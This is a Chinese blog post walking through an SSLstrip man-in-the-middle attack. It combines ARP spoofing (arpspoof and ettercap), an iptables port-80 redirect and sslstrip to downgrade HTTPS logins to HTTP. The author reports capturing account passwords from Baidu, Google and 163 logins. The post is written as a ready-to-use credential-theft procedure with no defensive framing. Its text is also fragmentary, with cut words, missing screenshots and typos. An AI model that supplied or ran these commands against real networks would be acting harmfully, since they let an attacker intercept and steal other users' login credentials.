千家信息网

SSLstrip 中间人欺骗Https转Http获取密码

发表于:2025-02-01 作者:千家信息网编辑
千家信息网最后更新 2025年02月01日,***回顾SSLstrip + EtterCap 中间人***实现https转换成http 以获取帐号密码。Linux环境下 我们使用iptables过滤一下数据包,然后用sslstrip监听端口,获
千家信息网最后更新 2025年02月01日SSLstrip 中间人欺骗Https转Http获取密码

***回顾

SSLstrip + EtterCap 中间人***实现https转换成http 以获取帐号密码。

Linux环境下 我们使用iptables过滤一下数据包,然后用sslstrip监听端口,获取数据。

数据包转发 echo 1 > /pro/sys/net/ipv4/ip_forward

然后开启Ettercap的iptables 功能

把注析去掉

来个arp欺骗不使用sslstrip 来测试一下https

Arpspoof -i -eth0 -t 192.168.1.102 192.168.1.2

Ok

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000

NAT 一定的基础

-T 匹配的表 NAT表 :PREROUTING 修改来的包

:OUTPUT 修改路由前本地的包

:POSTROUTING 修改准备发出的包

-A 表示加入高级选项

-P 协议类型

-J 表示把目标80端口的数据包转到其他端口 上诉命令是10000端口

开启ETTERCAP

Ettercap -T -q -I eth0

登录http的百度 效果良好

监听到数据了

登录google

发现在https 卡顿 无法通过

开启sslstrip

再向google登录的时候 https变成http

成功登录

监听到帐号密码

百度的

163的登录

http的跳转

网速过慢……

除了使用arpspoof 还可以使用

Ettercap -T -q -M arp:remote /192.168.1.101/ //

也是arp欺骗 原理一样的。

0